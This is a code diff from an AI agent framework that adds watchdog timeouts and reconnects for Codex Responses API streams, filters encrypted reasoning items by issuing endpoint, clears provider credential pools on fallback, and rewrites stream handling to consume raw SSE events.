# HERMES_CODEX_EVENT_STALE_TIMEOUT_SECONDS (0 disables each).
_codex_watchdog_enabled = agent.api_mode == "codex_responses"
_openai_codex_backend = _is_openai_codex_backend(agent)
_est_tokens_for_codex_watchdog = estimate_request_context_tokens(api_kwargs)
if _codex_watchdog_enabled and _openai_codex_backend:
if _est_tokens_for_codex_watchdog > 100_000:
_stale_timeout = max(_stale_timeout, 1200.0)
elif _est_tokens_for_codex_watchdog > 50_000:
_stale_timeout = max(_stale_timeout, 900.0)
elif _est_tokens_for_codex_watchdog > 25_000:
_stale_timeout = max(_stale_timeout, 600.0)
if _est_tokens_for_codex_watchdog > 100_000:
_codex_idle_timeout_default = 180.0
elif _est_tokens_for_codex_watchdog > 50_000:
_codex_idle_timeout_default = 120.0
elif _est_tokens_for_codex_watchdog > 10_000:
_codex_idle_timeout_default = 60.0
else:
_codex_idle_timeout_default = 12.0
_ttfb_enabled = _codex_watchdog_enabled
_ttfb_timeout = _env_float("HERMES_CODEX_TTFB_TIMEOUT_SECONDS", 12.0)
if _ttfb_timeout <= 0:
_ttfb_enabled = False
if _ttfb_enabled:
elif _openai_codex_backend:
_ttfb_disable_above = _env_float("HERMES_CODEX_TTFB_DISABLE_ABOVE_TOKENS", 25_000.0)
_ttfb_strict = os.environ.get("HERMES_CODEX_TTFB_STRICT", "").strip().lower() in {
"1", "true", "yes", "on"
}
if (
not _ttfb_strict
and _ttfb_disable_above > 0
and _est_tokens_for_codex_watchdog >= _ttfb_disable_above
):
_ttfb_enabled = False
logger.info(
"Disabling openai-codex no-byte TTFB watchdog for large request "
"(context=~%s tokens >= %.0f). Waiting for backend response instead. "
"Set HERMES_CODEX_TTFB_STRICT=1 to force early reconnects.",
f"{_est_tokens_for_codex_watchdog:,}",
_ttfb_disable_above,
)
else:
_ttfb_cap = _env_float("HERMES_CODEX_TTFB_MAX_SECONDS", 20.0)
if _ttfb_cap > 0 and _ttfb_timeout > _ttfb_cap:
logger.info(
"Capping openai-codex no-byte TTFB timeout from %.0fs to %.0fs "
"(context=~%s tokens). Set HERMES_CODEX_TTFB_MAX_SECONDS to tune.",
_ttfb_timeout,
_ttfb_cap,
f"{_est_tokens_for_codex_watchdog:,}",
)
_ttfb_timeout = _ttfb_cap
_codex_idle_enabled = _codex_watchdog_enabled
_codex_idle_timeout = _env_float(
"HERMES_CODEX_EVENT_STALE_TIMEOUT_SECONDS",
_codex_idle_timeout_default,
)
if _codex_idle_timeout <= 0:
_codex_idle_enabled = False
if _codex_watchdog_enabled:
# Reset before the worker starts so a marker left over from a previous
# call on this agent can't be misread as first-byte for this one.
agent._codex_stream_last_event_ts = None
agent._codex_stream_last_progress_ts = None
_call_start = time.time()
agent._touch_activity("waiting for non-streaming API response")
@@ -313,6 +388,13 @@ def interruptible_api_call(agent, api_kwargs: dict):
and _elapsed > _ttfb_timeout
and getattr(agent, "_codex_stream_last_event_ts", None) is None
):
_silent_hint: Optional[str] = None
_hint_fn = getattr(agent, "_codex_silent_hang_hint", None)
if callable(_hint_fn):
try:
_silent_hint = _hint_fn(model=api_kwargs.get("model"))
except Exception:
_silent_hint = None
logger.warning(
"Codex stream produced no bytes within TTFB cutoff "
"(%.0fs > %.0fs, model=%s). Backend accepted the connection "
@@ -320,11 +402,18 @@ def interruptible_api_call(agent, api_kwargs: dict):
"loop can reconnect.",
_elapsed, _ttfb_timeout, api_kwargs.get("model", "unknown"),
)
agent._emit_status(
f"⚠️ No first byte from provider in {int(_elapsed)}s "
f"(codex stream, model: {api_kwargs.get('model', 'unknown')}). "
f"Reconnecting."
)
if _silent_hint:
agent._buffer_status(
f"⚠️ No first byte from provider in {int(_elapsed)}s "
f"(codex stream, model: {api_kwargs.get('model', 'unknown')}). "
f"Reconnecting. {_silent_hint}"
)
else:
agent._buffer_status(
f"⚠️ No first byte from provider in {int(_elapsed)}s "
f"(codex stream, model: {api_kwargs.get('model', 'unknown')}). "
f"Reconnecting."
)
try:
_close_request_client_once("codex_ttfb_kill")
except Exception:
@@ -334,10 +423,55 @@ def interruptible_api_call(agent, api_kwargs: dict):
)
# Wait briefly for the worker to notice the closed connection.
t.join(timeout=2.0)
if result["error"] is None and result["response"] is None:
if _silent_hint:
result["error"] = TimeoutError(
f"Codex stream produced no bytes within {int(_elapsed)}s "
f"(TTFB threshold: {int(_ttfb_timeout)}s). {_silent_hint}"
)
else:
result["error"] = TimeoutError(
f"Codex stream produced no bytes within {int(_elapsed)}s "
f"(TTFB threshold: {int(_ttfb_timeout)}s)"
)
break
# Stream-idle detector: the Codex backend emitted at least one SSE
# frame, then stopped emitting events. Valid keepalive / in_progress
# frames refresh _codex_stream_last_event_ts and should not be killed.
_last_codex_event_ts = getattr(agent, "_codex_stream_last_event_ts", None)
if (
_codex_idle_enabled
and _last_codex_event_ts is not None
and (time.time() - _last_codex_event_ts) > _codex_idle_timeout
):
_event_stale_elapsed = time.time() - _last_codex_event_ts
logger.warning(
"Codex stream produced no SSE events for %.0fs after first byte "
"(threshold %.0fs, model=%s, context=~%s tokens). Killing "
"connection so the retry loop can reconnect.",
_event_stale_elapsed,
_codex_idle_timeout,
api_kwargs.get("model", "unknown"),
f"{_est_tokens_for_codex_watchdog:,}",
)
agent._buffer_status(
f"⚠️ Codex stream sent no events for {int(_event_stale_elapsed)}s "
f"after first byte (model: {api_kwargs.get('model', 'unknown')}). "
f"Reconnecting."
)
try:
_close_request_client_once("codex_stream_idle_kill")
except Exception:
pass
agent._touch_activity(
f"codex stream killed after {int(_event_stale_elapsed)}s with no SSE events"
)
t.join(timeout=2.0)
if result["error"] is None and result["response"] is None:
result["error"] = TimeoutError(
f"Codex stream produced no bytes within {int(_elapsed)}s "
f"(TTFB threshold: {int(_ttfb_timeout)}s)"
f"Codex stream produced no SSE events for {int(_event_stale_elapsed)}s "
f"after first byte (threshold: {int(_codex_idle_timeout)}s)"
)
break
@@ -359,13 +493,13 @@ def interruptible_api_call(agent, api_kwargs: dict):
api_kwargs.get("model", "unknown"), f"{_est_ctx:,}",
)
if _silent_hint:
agent._emit_status(
agent._buffer_status(
f"⚠️ No response from provider for {int(_elapsed)}s "
f"(non-streaming, model: {api_kwargs.get('model', 'unknown')}). "
f"{_silent_hint}"
)
else:
agent._emit_status(
agent._buffer_status(
f"⚠️ No response from provider for {int(_elapsed)}s "
f"(non-streaming, model: {api_kwargs.get('model', 'unknown')}). "
f"Aborting call."
@@ -507,6 +641,9 @@ def build_api_kwargs(agent, api_messages: list) -> dict:
is_codex_backend=is_codex_backend,
is_xai_responses=is_xai_responses,
github_reasoning_extra=agent._github_models_reasoning_extra_body() if is_github_responses else None,
replay_encrypted_reasoning=bool(
getattr(agent, "_codex_reasoning_replay_enabled", True)
),
)
# ── chat_completions (default) ─────────────────────────────────────
@@ -1019,6 +1156,25 @@ def try_activate_fallback(agent, reason: "FailoverReason | None" = None) -> bool
agent._transport_cache.clear()
agent._fallback_activated = True
# Clear the credential pool when the fallback provider doesn't match
# the pool's provider. The pool was seeded for the primary provider;
# leaving it attached means downstream recovery (rate_limit / billing /
# auth) calls ``_swap_credential`` with a primary entry which overwrites
# the agent's ``base_url`` back to the primary's endpoint — every
# fallback request then 404s against the wrong host. See #33163.
# When the fallback shares the pool's provider (e.g. both openrouter
# entries with different routing) the pool is preserved.
_existing_pool = getattr(agent, "_credential_pool", None)
if _existing_pool is not None:
_pool_provider = (getattr(_existing_pool, "provider", "") or "").strip().lower()
if _pool_provider and _pool_provider != fb_provider:
logger.info(
"Fallback to %s/%s: clearing primary credential pool "
"(pool_provider=%s) to prevent cross-provider contamination",
fb_provider, fb_model, _pool_provider,
)
agent._credential_pool = None
# Honor per-provider / per-model request_timeout_seconds for the
# fallback target (same knob the primary client uses). None = use
# SDK default.
@@ -1106,7 +1262,7 @@ def try_activate_fallback(agent, reason: "FailoverReason | None" = None) -> bool
api_mode=agent.api_mode,
)
agent._emit_status(
agent._buffer_status(
f"🔄 Primary model failed — switching to fallback: "
f"{fb_model} via {fb_provider}"
)
@@ -2095,7 +2251,7 @@ def interruptible_streaming_api_call(agent, api_kwargs: dict, *, on_first_delta=
mid_tool_call=False,
diag=request_client_holder.get("diag"),
)
agent._emit_status(
agent._buffer_status(
"❌ Provider returned malformed streaming data after "
f"{_max_stream_retries + 1} attempts. "
"The provider may be experiencing issues — "
@@ -2202,7 +2358,7 @@ def interruptible_streaming_api_call(agent, api_kwargs: dict, *, on_first_delta=
_stale_elapsed, _stream_stale_timeout,
api_kwargs.get("model", "unknown"), f"{_est_ctx:,}",
)
agent._emit_status(
agent._buffer_status(
f"⚠️ No response from provider for {int(_stale_elapsed)}s "
f"(model: {api_kwargs.get('model', 'unknown')}, "
f"context: ~{_est_ctx:,} tokens). "
+143 -11
View File
@@ -23,6 +23,38 @@ from agent.prompt_builder import DEFAULT_AGENT_IDENTITY
logger = logging.getLogger(__name__)
def _classify_responses_issuer(
*,
is_xai_responses: bool = False,
is_github_responses: bool = False,
is_codex_backend: bool = False,
base_url: Optional[str] = None,
) -> str:
"""Stable identifier for the Responses endpoint that mints encrypted_content.
``reasoning.encrypted_content`` is sealed to the endpoint that issued it:
replaying a Codex-minted blob against xAI (or vice versa) deterministically
returns HTTP 400 ``invalid_encrypted_content``. Stamping the issuer on
persisted reasoning items and filtering at replay time lets a single
conversation switch models without poisoning history with un-decryptable
reasoning blocks.
"""
if is_xai_responses:
return "xai_responses"
if is_github_responses:
return "github_responses"
if is_codex_backend:
return "codex_backend"
if base_url:
return f"other:{base_url}"
return "other"
# Throttle the per-process cross-issuer skip warning so we don't flood logs
# when a long history contains many stale-issuer reasoning blocks.
_CROSS_ISSUER_WARN_EMITTED = False
# Matches Codex/Harmony tool-call serialization that occasionally leaks into
# assistant-message content when the model fails to emit a structured
# ``function_call`` item. Accepts the common forms:
@@ -248,6 +280,8 @@ def _chat_messages_to_responses_input(
messages: List[Dict[str, Any]],
*,
is_xai_responses: bool = False,
replay_encrypted_reasoning: bool = True,
current_issuer_kind: Optional[str] = None,
) -> List[Dict[str, Any]]:
"""Convert internal chat-style messages to Responses input items.
@@ -261,6 +295,27 @@ def _chat_messages_to_responses_input(
integration). We now replay encrypted reasoning on every Responses
transport (xAI, native Codex, custom relays) and let xAI tell us
explicitly if a specific surface ever rejects a payload.
``replay_encrypted_reasoning`` is the per-session kill switch. Some
OpenAI-compatible relays accept the request but later reject the
replayed encrypted blob with HTTP 400 ``invalid_encrypted_content``;
when that happens the retry loop calls
``AIAgent._disable_codex_reasoning_replay`` which both strips cached
items from the conversation history and threads ``replay_enabled=False``
through this converter so subsequent turns send no reasoning items.
``current_issuer_kind`` enables a per-item cross-issuer guard. The
Responses API's ``encrypted_content`` blob is decryptable only by the
endpoint that minted it replaying a Codex-issued blob against xAI
(or vice versa) always yields HTTP 400 ``invalid_encrypted_content``
and breaks every subsequent turn in the same session. When this
argument is provided and a reasoning item carries an ``_issuer_kind``
stamp from a different endpoint, the item is dropped from the replayed
input. Legacy items without a stamp are still replayed
(backwards-compatible). The two guards compose:
``replay_encrypted_reasoning=False`` is the session-wide kill switch
(drops ALL replay); ``current_issuer_kind`` is the per-item filter
that runs only when replay is still enabled.
"""
items: List[Dict[str, Any]] = []
seen_item_ids: set = set()
@@ -290,7 +345,11 @@ def _chat_messages_to_responses_input(
# This applies to every Responses transport including
# xAI — see _chat_messages_to_responses_input docstring
# for the May 2026 reversal of the earlier xAI gate.
codex_reasoning = msg.get("codex_reasoning_items")
codex_reasoning = (
msg.get("codex_reasoning_items")
if replay_encrypted_reasoning
else None
)
has_codex_reasoning = False
if isinstance(codex_reasoning, list):
for ri in codex_reasoning:
@@ -298,11 +357,40 @@ def _chat_messages_to_responses_input(
item_id = ri.get("id")
if item_id and item_id in seen_item_ids:
continue
# Cross-issuer guard: drop reasoning blocks that
# were minted by a different Responses endpoint.
# The current endpoint cannot decrypt foreign
# encrypted_content and would reject the whole
# request with HTTP 400 invalid_encrypted_content.
# Unstamped (legacy) items pass through.
item_issuer = ri.get("_issuer_kind")
if (
current_issuer_kind is not None
and item_issuer is not None
and item_issuer != current_issuer_kind
):
global _CROSS_ISSUER_WARN_EMITTED
if not _CROSS_ISSUER_WARN_EMITTED:
logger.warning(
"Dropping reasoning item minted by %s while "
"calling %s — encrypted_content is sealed to "
"its issuer. This happens when a session "
"switches model providers mid-conversation.",
item_issuer, current_issuer_kind,
)
_CROSS_ISSUER_WARN_EMITTED = True
continue
# Strip the "id" field — with store=False the
# Responses API cannot look up items by ID and
# returns 404. The encrypted_content blob is
# self-contained for reasoning chain continuity.
replay_item = {k: v for k, v in ri.items() if k != "id"}
# Also strip the internal "_issuer_kind" stamp;
# it is a Hermes-side metadata key and not part
# of the Responses API schema.
replay_item = {
k: v for k, v in ri.items()
if k not in ("id", "_issuer_kind")
}
items.append(replay_item)
if item_id:
seen_item_ids.add(item_id)
@@ -825,6 +913,26 @@ def _preflight_codex_api_kwargs(
elif "stream" in api_kwargs:
raise ValueError("Codex Responses stream flag is only allowed in fallback streaming requests.")
# Safety-net sanitization for xAI Responses (#28490): defense-in-depth
# for the same slash-enum strip that ``chat_completion_helpers`` and
# ``auxiliary_client`` apply at request-build time. If a future code
# path forgets to sanitize before calling us, this catches the bypass
# so xAI doesn't 400 with ``Invalid arguments passed to the model``
# (HuggingFace IDs like ``Qwen/Qwen3.5-0.8B`` from MCP tool schemas).
#
# Gated on the model name pattern because native Codex (OpenAI) DOES
# accept slash-containing enum values — stripping them there would
# silently degrade tool-schema constraints. xAI is the only
# Responses-API surface that rejects the shape.
model_name_for_provider_check = str(api_kwargs.get("model") or "").lower()
is_xai_model = model_name_for_provider_check.startswith(("grok-", "x-ai/grok-"))
if is_xai_model and normalized.get("tools"):
try:
from tools.schema_sanitizer import strip_slash_enum
normalized["tools"], _ = strip_slash_enum(normalized["tools"])
except Exception:
pass # Best-effort — the caller-level sanitization should have handled it
unexpected = sorted(key for key in api_kwargs if key not in allowed_keys)
if unexpected:
raise ValueError(
@@ -876,8 +984,18 @@ def _extract_responses_reasoning_text(item: Any) -> str:
# Full response normalization
# ---------------------------------------------------------------------------
def _normalize_codex_response(response: Any) -> tuple[Any, str]:
"""Normalize a Responses API object to an assistant_message-like object."""
def _normalize_codex_response(
response: Any,
*,
issuer_kind: Optional[str] = None,
) -> tuple[Any, str]:
"""Normalize a Responses API object to an assistant_message-like object.
``issuer_kind`` (when provided) is stamped onto each reasoning item the
response yields, so future replays can detect when the active endpoint
differs from the one that minted the encrypted_content blob and drop
the item instead of triggering HTTP 400 invalid_encrypted_content.
"""
output = getattr(response, "output", None)
if not isinstance(output, list) or not output:
# The Codex backend can return empty output when the answer was
@@ -919,6 +1037,7 @@ def _normalize_codex_response(response: Any) -> tuple[Any, str]:
has_incomplete_items = response_status in {"queued", "in_progress", "incomplete"}
saw_commentary_phase = False
saw_final_answer_phase = False
saw_reasoning_item = False
for item in output:
item_type = getattr(item, "type", None)
@@ -956,6 +1075,7 @@ def _normalize_codex_response(response: Any) -> tuple[Any, str]:
raw_message_item["phase"] = normalized_phase
message_items_raw.append(raw_message_item)
elif item_type == "reasoning":
saw_reasoning_item = True
reasoning_text = _extract_responses_reasoning_text(item)
if reasoning_text:
reasoning_parts.append(reasoning_text)
@@ -965,7 +1085,19 @@ def _normalize_codex_response(response: Any) -> tuple[Any, str]:
encrypted = getattr(item, "encrypted_content", None)
if isinstance(encrypted, str) and encrypted:
raw_item = {"type": "reasoning", "encrypted_content": encrypted}
# Stamp the issuer so future turns can detect when a
# model swap moved the conversation to an endpoint that
# cannot decrypt this blob — see _chat_messages_to_responses_input
# cross-issuer guard.
if issuer_kind:
raw_item["_issuer_kind"] = issuer_kind
item_id = getattr(item, "id", None)
if isinstance(item_id, str) and item_id.startswith("rs_tmp_"):
logger.debug(
"Skipping transient Codex reasoning item during normalization: %s",
item_id,
)
continue
if isinstance(item_id, str) and item_id:
raw_item["id"] = item_id
# Capture summary — required by the API when replaying reasoning items
@@ -1076,13 +1208,13 @@ def _normalize_codex_response(response: Any) -> tuple[Any, str]:
finish_reason = "incomplete"
elif has_incomplete_items or (saw_commentary_phase and not saw_final_answer_phase):
finish_reason = "incomplete"
elif reasoning_items_raw and not final_text:
# Response contains only reasoning (encrypted thinking state) with
# no visible content or tool calls. The model is still thinking and
# needs another turn to produce the actual answer. Marking this as
# "stop" would send it into the empty-content retry loop which burns
# 3 retries then fails — treat it as incomplete instead so the Codex
# continuation path handles it correctly.
elif (reasoning_items_raw or reasoning_parts or saw_reasoning_item) and not final_text:
# Response contains only reasoning (encrypted thinking state and/or
# human-readable summary) with no visible content or tool calls. The
# model is still thinking and needs another turn to produce the actual
# answer. Marking this as "stop" would send it into the empty-content
# retry loop which burns retries then fails — treat it as incomplete so
# the Codex continuation path handles it correctly.
finish_reason = "incomplete"
else:
finish_reason = "stop"
+331 -249
View File
@@ -174,281 +174,363 @@ def run_codex_app_server_turn(
}
# ---------------------------------------------------------------------------
# Event-driven Responses streaming
#
# OpenAI ships its consumer Codex backend (chatgpt.com/backend-api/codex) on
# a different schedule from the openai Python SDK. The high-level
# ``client.responses.stream(...)`` helper reconstructs a typed Response from
# the terminal ``response.completed`` event's ``response.output`` field, and
# when that field drifts to ``null`` (gpt-5.5, May 2026) the SDK raises
# ``TypeError: 'NoneType' object is not iterable`` mid-iteration.
#
# We sidestep the whole class of failure by going one level lower:
# ``client.responses.create(stream=True)`` returns the raw AsyncIterable of
# SSE events, and we assemble the final response object purely from
# ``response.output_item.done`` events as they arrive. We never read
# ``response.completed.response.output`` for content reconstruction, so the
# backend can return ``null``, ``[]``, a string, or omit the field entirely
# and we don't care.
#
# This mirrors what the OpenClaw TS implementation does for the same backend
# and is structurally immune to the bug class rather than patched.
# ---------------------------------------------------------------------------
def run_codex_stream(agent, api_kwargs: dict, client: Any = None, on_first_delta: callable = None):
"""Execute one streaming Responses API request and return the final response."""
_TERMINAL_EVENT_TYPES = frozenset({
"response.completed",
"response.incomplete",
"response.failed",
})
def _event_field(event: Any, name: str, default: Any = None) -> Any:
"""Field access that handles both attr-style (SDK objects) and dict (raw JSON) events."""
value = getattr(event, name, None)
if value is None and isinstance(event, dict):
value = event.get(name, default)
return value if value is not None else default
def _raise_stream_error(event: Any) -> None:
"""Raise a ``_StreamErrorEvent`` from a ``type=error`` SSE frame.
Imported lazily so this module stays importable from places that don't
pull in ``run_agent`` (e.g. plugin code, doc tools).
"""
from run_agent import _StreamErrorEvent
message = (_event_field(event, "message", "") or "stream emitted error event").strip()
raise _StreamErrorEvent(
message,
code=_event_field(event, "code"),
param=_event_field(event, "param"),
)
def _consume_codex_event_stream(
event_iter: Any,
*,
model: str,
on_text_delta=None,
on_reasoning_delta=None,
on_first_delta=None,
on_event=None,
interrupt_check=None,
) -> SimpleNamespace:
"""Consume a Codex Responses SSE event stream and return a final response.
The returned object is a ``SimpleNamespace`` shaped like the SDK's typed
``Response`` for the fields downstream code actually reads:
* ``output``: list of output items, assembled from ``response.output_item.done``.
For tool-call turns this contains the function_call items; for plain-text
turns it contains a synthesized ``message`` item built from streamed deltas
if no message item was emitted directly.
* ``output_text``: assembled text from ``response.output_text.delta`` deltas.
* ``usage``: copied from the terminal event's ``response.usage`` (when present).
* ``status``: ``completed`` / ``incomplete`` / ``failed`` (or ``completed`` if
the stream ended without a terminal frame but produced content).
* ``id``: ``response.id`` when present.
* ``incomplete_details``: passed through for ``response.incomplete`` frames.
* ``error``: passed through for ``response.failed`` frames.
* ``model``: from kwargs (the wire model name is not authoritative).
Critically, we never read ``response.output`` from the terminal event for
content reconstruction only ``usage``, ``status``, ``id``. That field
being ``null`` / ``[]`` / missing is fine.
Callbacks:
* ``on_text_delta(str)`` fires per ``response.output_text.delta``, suppressed
once a function_call event is seen (so tool-call turns don't bleed text
into the chat).
* ``on_reasoning_delta(str)`` fires per ``response.reasoning.*.delta``.
* ``on_first_delta()`` one-shot, fires on the first text delta only.
* ``on_event(event)`` fires for every event before any other processing.
Used for watchdog activity, debug logging, anything wire-shape-agnostic.
* ``interrupt_check()`` returns True to break the loop early.
"""
collected_output_items: List[Any] = []
collected_text_deltas: List[str] = []
has_tool_calls = False
first_delta_fired = False
terminal_status: str = "completed"
terminal_usage: Any = None
terminal_response_id: str = None
terminal_incomplete_details: Any = None
terminal_error: Any = None
saw_terminal = False
for event in event_iter:
if on_event is not None:
try:
on_event(event)
except (TimeoutError, InterruptedError):
# Control-flow signals from watchdog/cancellation hooks must
# propagate, not get swallowed as "debug noise".
raise
except Exception:
# Genuine bugs in third-party debug/log hooks shouldn't break
# stream consumption.
logger.debug("Codex stream on_event hook raised", exc_info=True)
if interrupt_check is not None and interrupt_check():
break
event_type = _event_field(event, "type", "")
if not isinstance(event_type, str):
event_type = ""
# ``error`` SSE frames carry the provider's real failure reason
# (subscription / quota / model-not-available / rejected-reasoning-replay)
# but never appear in the terminal set. Surface them as a structured
# exception so the credential pool + error classifier see the body.
if event_type == "error":
_raise_stream_error(event)
if "output_text.delta" in event_type or event_type == "response.output_text.delta":
delta_text = _event_field(event, "delta", "")
if delta_text:
collected_text_deltas.append(delta_text)
if not has_tool_calls:
if not first_delta_fired:
first_delta_fired = True
if on_first_delta is not None:
try:
on_first_delta()
except Exception:
logger.debug("Codex stream on_first_delta raised", exc_info=True)
if on_text_delta is not None:
try:
on_text_delta(delta_text)
except Exception:
logger.debug("Codex stream on_text_delta raised", exc_info=True)
continue
if "function_call" in event_type:
has_tool_calls = True
# fall through — function_call items still get added on output_item.done
if "reasoning" in event_type and "delta" in event_type:
reasoning_text = _event_field(event, "delta", "")
if reasoning_text and on_reasoning_delta is not None:
try:
on_reasoning_delta(reasoning_text)
except Exception:
logger.debug("Codex stream on_reasoning_delta raised", exc_info=True)
continue
if event_type == "response.output_item.done":
done_item = _event_field(event, "item")
if done_item is not None:
collected_output_items.append(done_item)
continue
if event_type in _TERMINAL_EVENT_TYPES:
saw_terminal = True
resp_obj = _event_field(event, "response")
if resp_obj is not None:
terminal_usage = getattr(resp_obj, "usage", None)
if terminal_usage is None and isinstance(resp_obj, dict):
terminal_usage = resp_obj.get("usage")
rid = getattr(resp_obj, "id", None)
if rid is None and isinstance(resp_obj, dict):
rid = resp_obj.get("id")
terminal_response_id = rid
rstatus = getattr(resp_obj, "status", None)
if rstatus is None and isinstance(resp_obj, dict):
rstatus = resp_obj.get("status")
if isinstance(rstatus, str):
terminal_status = rstatus
if event_type == "response.incomplete":
terminal_incomplete_details = getattr(resp_obj, "incomplete_details", None)
if terminal_incomplete_details is None and isinstance(resp_obj, dict):
terminal_incomplete_details = resp_obj.get("incomplete_details")
if event_type == "response.failed":
terminal_error = getattr(resp_obj, "error", None)
if terminal_error is None and isinstance(resp_obj, dict):
terminal_error = resp_obj.get("error")
if event_type == "response.completed":
terminal_status = terminal_status or "completed"
elif event_type == "response.incomplete":
terminal_status = terminal_status or "incomplete"
elif event_type == "response.failed":
terminal_status = terminal_status or "failed"
# Stop on terminal event.
break
# Build the final output list. Prefer items observed via output_item.done;
# if none arrived but we streamed plain text deltas (no tool calls), synthesize
# a single message item so downstream normalization has something to work with.
if collected_output_items:
output = list(collected_output_items)
elif collected_text_deltas and not has_tool_calls:
assembled = "".join(collected_text_deltas)
output = [SimpleNamespace(
type="message",
role="assistant",
status="completed",
content=[SimpleNamespace(type="output_text", text=assembled)],
)]
else:
output = []
# If the stream ended without any terminal event AND produced no usable
# content (no items, no text deltas), surface that as a RuntimeError so
# callers can distinguish "stream truncated mid-flight / provider rejected
# the call" from "stream completed with empty body". This preserves the
# signal the SDK's high-level helper used to raise as
# ``RuntimeError("Didn't receive a `response.completed` event.")``.
if not saw_terminal and not output:
raise RuntimeError(
"Codex Responses stream did not emit a terminal response"
)
assembled_text = "".join(collected_text_deltas)
final = SimpleNamespace(
output=output,
output_text=assembled_text,
usage=terminal_usage,
status=terminal_status,
id=terminal_response_id,
model=model,
incomplete_details=terminal_incomplete_details,
error=terminal_error,
)
return final
def run_codex_stream(agent, api_kwargs: dict, client: Any = None, on_first_delta=None):
"""Execute one streaming Responses API request and return the final response.
Uses ``responses.create(stream=True)`` (low-level raw event iteration)
rather than the high-level ``responses.stream(...)`` helper. This makes
us structurally immune to backend drift in the ``response.completed``
payload shape we never let the SDK reconstruct a typed object from
the terminal event's ``output`` field.
"""
import httpx as _httpx
active_client = client or agent._ensure_primary_openai_client(reason="codex_stream_direct")
max_stream_retries = 1
has_tool_calls = False
first_delta_fired = False
# Accumulate streamed text so we can recover if get_final_response()
# returns empty output (e.g. chatgpt.com backend-api sends
# response.incomplete instead of response.completed).
# Accumulate streamed text so callers / compat shims can read it.
agent._codex_streamed_text_parts: list = []
def _on_text_delta(text: str) -> None:
agent._codex_streamed_text_parts.append(text)
agent._fire_stream_delta(text)
def _on_reasoning_delta(text: str) -> None:
agent._fire_reasoning_delta(text)
def _on_event(event: Any) -> None:
# TTFB watchdog and activity touch — runs once per SSE event.
agent._codex_stream_last_event_ts = time.time()
agent._touch_activity("receiving stream response")
def _interrupt_check() -> bool:
return bool(agent._interrupt_requested)
for attempt in range(max_stream_retries + 1):
if agent._interrupt_requested:
raise InterruptedError("Agent interrupted before Codex stream retry")
collected_output_items: list = []
stream_kwargs = dict(api_kwargs)
stream_kwargs["stream"] = True
try:
with active_client.responses.stream(**api_kwargs) as stream:
for event in stream:
# Mark stream activity for the TTFB watchdog in
# interruptible_api_call. The Codex backend can accept the
# connection but never emit a single event; this timestamp
# staying None tells the watchdog no bytes are flowing.
agent._codex_stream_last_event_ts = time.time()
agent._touch_activity("receiving stream response")
if agent._interrupt_requested:
break
event_type = getattr(event, "type", "")
# Fire callbacks on text content deltas (suppress during tool calls)
if "output_text.delta" in event_type or event_type == "response.output_text.delta":
delta_text = getattr(event, "delta", "")
if delta_text:
agent._codex_streamed_text_parts.append(delta_text)
if delta_text and not has_tool_calls:
if not first_delta_fired:
first_delta_fired = True
if on_first_delta:
try:
on_first_delta()
except Exception:
pass
agent._fire_stream_delta(delta_text)
# Track tool calls to suppress text streaming
elif "function_call" in event_type:
has_tool_calls = True
# Fire reasoning callbacks
elif "reasoning" in event_type and "delta" in event_type:
reasoning_text = getattr(event, "delta", "")
if reasoning_text:
agent._fire_reasoning_delta(reasoning_text)
# Collect completed output items — some backends
# (chatgpt.com/backend-api/codex) stream valid items
# via response.output_item.done but the SDK's
# get_final_response() returns an empty output list.
elif event_type == "response.output_item.done":
done_item = getattr(event, "item", None)
if done_item is not None:
collected_output_items.append(done_item)
# Log non-completed terminal events for diagnostics
elif event_type in {"response.incomplete", "response.failed"}:
resp_obj = getattr(event, "response", None)
status = getattr(resp_obj, "status", None) if resp_obj else None
incomplete_details = getattr(resp_obj, "incomplete_details", None) if resp_obj else None
logger.warning(
"Codex Responses stream received terminal event %s "
"(status=%s, incomplete_details=%s, streamed_chars=%d). %s",
event_type, status, incomplete_details,
sum(len(p) for p in agent._codex_streamed_text_parts),
agent._client_log_context(),
)
final_response = stream.get_final_response()
# PATCH: ChatGPT Codex backend streams valid output items
# but get_final_response() can return an empty output list.
# Backfill from collected items or synthesize from deltas.
_out = getattr(final_response, "output", None)
if isinstance(_out, list) and not _out:
if collected_output_items:
final_response.output = list(collected_output_items)
logger.debug(
"Codex stream: backfilled %d output items from stream events",
len(collected_output_items),
)
elif agent._codex_streamed_text_parts and not has_tool_calls:
assembled = "".join(agent._codex_streamed_text_parts)
final_response.output = [SimpleNamespace(
type="message",
role="assistant",
status="completed",
content=[SimpleNamespace(type="output_text", text=assembled)],
)]
logger.debug(
"Codex stream: synthesized output from %d text deltas (%d chars)",
len(agent._codex_streamed_text_parts), len(assembled),
)
return final_response
event_stream = active_client.responses.create(**stream_kwargs)
except (_httpx.RemoteProtocolError, _httpx.ReadTimeout, _httpx.ConnectError, ConnectionError) as exc:
if attempt < max_stream_retries:
logger.debug(
"Codex Responses stream transport failed (attempt %s/%s); retrying. %s error=%s",
attempt + 1,
max_stream_retries + 1,
agent._client_log_context(),
exc,
"Codex Responses stream connect failed (attempt %s/%s); retrying. %s error=%s",
attempt + 1, max_stream_retries + 1,
agent._client_log_context(), exc,
)
continue
logger.debug(
"Codex Responses stream transport failed; falling back to create(stream=True). %s error=%s",
agent._client_log_context(),
exc,
)
return agent._run_codex_create_stream_fallback(api_kwargs, client=active_client)
except RuntimeError as exc:
err_text = str(exc)
missing_completed = "response.completed" in err_text
# The OpenAI SDK's Responses streaming state machine raises
# ``RuntimeError("Expected to have received `response.created`
# before `<event-type>`")`` when the first SSE event from the
# server is anything other than ``response.created`` — and it
# discards the event's payload before we can read it. Three
# real-world backends emit a different first frame:
#
# * xAI on grok-4.x OAuth — sends ``error`` (issues
# reported around the May 2026 SuperGrok rollout when
# multi-turn conversations replay encrypted reasoning
# content the OAuth tier rejects)
# * codex-lb relays — send ``codex.rate_limits`` (#14634)
# * custom Responses relays — send ``response.in_progress``
# (#8133)
#
# In all three cases the underlying byte stream is still
# readable: a non-stream ``responses.create(stream=True)``
# fallback succeeds and surfaces the real provider error as
# a normal exception with body+status_code attached, which
# ``_summarize_api_error`` can then translate into a useful
# user-facing line. Treat ``response.created`` prelude
# errors the same way we already treat ``response.completed``
# postlude errors.
prelude_error = (
"Expected to have received `response.created`" in err_text
or "Expected to have received \"response.created\"" in err_text
)
if (missing_completed or prelude_error) and attempt < max_stream_retries:
logger.debug(
"Responses stream %s (attempt %s/%s); retrying. %s",
"prelude rejected" if prelude_error else "closed before completion",
attempt + 1,
max_stream_retries + 1,
agent._client_log_context(),
)
continue
if missing_completed or prelude_error:
logger.debug(
"Responses stream %s; falling back to create(stream=True). %s err=%s",
"rejected before response.created" if prelude_error else "did not emit response.completed",
agent._client_log_context(),
err_text,
)
